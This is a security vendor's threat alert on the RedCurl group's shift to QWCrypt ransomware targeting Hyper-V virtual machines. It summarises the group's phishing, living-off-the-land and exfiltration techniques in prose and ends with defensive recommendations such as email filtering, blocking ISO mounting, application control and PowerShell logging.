RedCurl: The Russian-Speaking Cyber Group Expanding Its Tactics with QWCrypt Ransomware

The notorious threat actor RedCurl, renowned for its corporate espionage activities since 2018, has recently pivoted to deploying ransomware specifically targeting Hyper-V virtual machines. Historically, RedCurl’s modus operandi has involved advanced social engineering techniques, such as sending phishing emails with malicious attachments and leveraging legitimate tools like PowerShell to execute malware.

Threat alert
March 27, 2025

The notorious threat actor RedCurl, renowned for its corporate espionage activities since 2018, has recently pivoted to deploying ransomware specifically targeting Hyper-V virtual machines. Historically, RedCurl’s modus operandi has involved advanced social engineering techniques, such as sending phishing emails with malicious attachments and leveraging legitimate tools like PowerShell to execute malware.

This Russian-speaking cyber group, which initially focused on stealthy corporate espionage campaigns, has targeted various industries, including finance, construction, tourism, and consulting. Their primary objective has been to exfiltrate confidential corporate documents, business emails, and sensitive data from organizations across multiple countries, notably the U.K.

In a significant shift, RedCurl has now adopted the QWCrypt ransomware. Researchers have proposed several theories to explain this change in tactics. One hypothesis suggests that the group is expanding its service offerings, while another posits that the use of ransomware could be a diversionary tactic to mislead investigators and conceal their true intentions.

Phishing activity

RedCurl initiates its attacks with meticulously crafted phishing emails, often disguised as job applications or HR-related documents. These emails contain malicious attachments, such as .ISO and .IMG files, which trigger a multi-stage infection process when opened. The attachments exploit DLL sideloading vulnerabilities to compromise the target system.

QWCrypt & RedLoader

QWCrypt is a sophisticated ransomware tool designed to encrypt Hyper-V virtual machines. It employs advanced encryption methods, including the XChaCha20-Poly1305 algorithm, and its ransom notes mimic those of other notorious ransomware groups like LockBit and HardBit.

RedCurl also utilises a piece of malware called RedLoader, which is capable of various obfuscation techniques making it extremely difficult to detect.

PowerShell & Living Off the Land

RedCurl leverages legitimate tools and custom malware to maintain stealth and persistence within compromised networks. They use SysInternals and Active Directory Explorer for reconnaissance and PowerShell scripts to disable defenses before deploying ransomware. Their operations involve a long-term presence in victim networks, utilizing legitimate services and custom tools to avoid detection. The group also employs cloud storage services and PowerShell scripts for data exfiltration and command-and-control purposes.

For example, the initial command uses PowerShell to download a file (curl.tmp) from a specified URL and saves it as curl.exe in the C:\Windows\System32\ directory. Similarly, 7za.tmp is downloaded and saved as 7za.exe, a copy of the popular open-source file compression utility 7-Zip.

RedCurl blends in with normal network activity by leveraging legitimate tools and services. They use PowerShell, curl, and the Program Compatibility Assistant (pcalua.exe) to execute malicious commands and evade detection. For instance, scheduled tasks are created to execute pcalua.exe, which then runs malicious binaries or Python scripts. These tasks are named similarly to common legitimate Windows scheduled tasks to avoid suspicion.

Data Exfiltration

Once inside a network, RedCurl focuses on stealing confidential documents and business emails. They use tools like LaZagne to steal credentials and employ cloud storage services for data exfiltration, making it difficult to track their activities.

Recommendations

  • Implement advanced email filtering solutions to detect and block phishing emails containing malicious attachments such as .ISO and .IMG files.
  • Additionally, prevent automatic mounting of ISO/IMG by Group Policy.
  • Limit access to free web hosting or cloud storage resources, excluding those approved to be used within the organisation.
  • Implement strict application control policies to limit the execution of unauthorised scripts and binaries.
  • Implement network segmentation to limit lateral movement within the network. Restrict SMB and RDP access where unnecessary to prevent the spread of malware.
  • Enforce least privilege access controls and use phishing-resistant multi-factor authentication (MFA) methods like FIDO tokens or Microsoft Authenticator with passkeys to enhance account security.
  • Monitor any use of commands and built-in tools that are often used for collecting information about the system and files. Enable detailed logging for PowerShell and other scripting environments

Here at Socura we are focusing on proactive threat hunts and creating rules to detect malicious activities and threat actors’ behaviour.